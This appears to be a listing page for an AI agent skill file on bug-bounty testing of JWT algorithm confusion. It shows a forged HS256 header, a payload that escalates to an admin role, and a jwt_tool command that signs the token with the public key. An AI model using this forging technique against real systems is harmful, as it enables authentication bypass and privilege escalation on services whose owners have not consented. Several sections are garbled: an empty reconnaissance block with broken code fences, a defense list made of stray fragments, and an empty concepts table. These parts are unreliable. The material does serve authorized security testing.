jwt-algorithm-confusion

star 15

Identify and exploit Algorithm Confusion vulnerabilities in JSON Web Tokens (JWT). This skill details how to bypass signature verification by changing the signing algorithm from asymmetric (RS256) to symmetric (HS256) and using the public key as the symmetric secret.

ShulkwiSEC By ShulkwiSEC schedule Updated 6/12/2026
play_arrow Run Skill in Manus View GitHub

name: jwt-algorithm-confusion description: > Identify and exploit Algorithm Confusion vulnerabilities in JSON Web Tokens (JWT). This skill details how to bypass signature verification by changing the signing algorithm from asymmetric (RS256) to symmetric (HS256) and using the public key as the symmetric secret. domain: cybersecurity subdomain: bug-hunting category: APIs difficulty: advanced estimated_time: "2 hours" mitre_attack: tactics: [TA0006, TA0004] techniques: [T1550.004] platforms: [web, api] tags: [jwt, api-security, logic-flaws, authentication, cryptography, bug-hunting] tools: [burp-suite, json-web-tokens] version: "1.0" author: CyberSkills-Elite license: Apache-2.0

JWT Algorithm Confusion

When to Use

  • When testing APIs or web applications that use JWTs for session management or authentication.
  • To attempt to forge arbitrary JWTs (e.g., escalating to 'admin') when the application utilizes an asymmetric signature algorithm (like RS256) and the application's public key can be obtained.

Prerequisites

  • Authorized scope and target URLs from bug bounty program
  • Burp Suite Professional (or Community) configured with browser proxy
  • Familiarity with OWASP Top 10 and common web vulnerability classes
  • SecLists wordlists for fuzzing and enumeration

Workflow

Phase 1: Reconnaissance (Finding the Public Key)

# Concept: JWT Algorithm Confusion ```

### Phase 2: Intercepting and Modifying the JWT Header

```json
// {
  "alg": "HS256",
  "typ": "JWT"
}

Phase 3: Modifying the Payload (Privilege Escalation)

// {
  "user": "attacker",
  "role": "admin",
  "iat": 1716260400
}

Phase 4: Signing the Forged JWT

# jwt_tool.py [ENCODED_HEADER].[ENCODED_PAYLOAD] -S hs256 -k public_key.pem

Decision Point ๐Ÿ”€

flowchart TD
    A[Forge JWT ] --> B{Server Accepts? ]}
    B -->|Yes| C[Exploit API ]
    B -->|No| D[Check None Alg ]
    C --> E[Document Flaw ]

๐Ÿ”ต Blue Team Detection & Defense

  • Enforce Algorithm Verification: Library Updates: Public Key Secrecy (Symmetric fallback): Key Concepts
    Concept Description

Output Format

Jwt Algorithm Confusion โ€” Assessment Report
============================================================
Target: [Target identifier]
Assessor: [Operator name]
Date: [Assessment date]
Scope: [Authorized scope]
MITRE ATT&CK: [Relevant technique IDs]

Findings Summary:
  [Finding 1]: [Severity] โ€” [Brief description]
  [Finding 2]: [Severity] โ€” [Brief description]

Detailed Results:
  Phase 1: [Phase name]
    - Result: [Outcome]
    - Evidence: [Screenshot/log reference]
    - Impact: [Business impact assessment]

  Phase 2: [Phase name]
    - Result: [Outcome]
    - Evidence: [Screenshot/log reference]
    - Impact: [Business impact assessment]

Risk Rating: [Critical/High/Medium/Low/Informational]
Recommendations:
  1. [Immediate remediation step]
  2. [Long-term hardening measure]
  3. [Monitoring/detection improvement]

๐Ÿ“š Shared Resources

For cross-cutting methodology applicable to all vulnerability classes, see:

References

Install via CLI
npx skills add https://github.com/ShulkwiSEC/bb-huge --skill jwt-algorithm-confusion
Repository Details
star Stars 15
call_split Forks 4
navigation Branch main
article Path SKILL.md
More from Creator
ShulkwiSEC
ShulkwiSEC Explore all skills →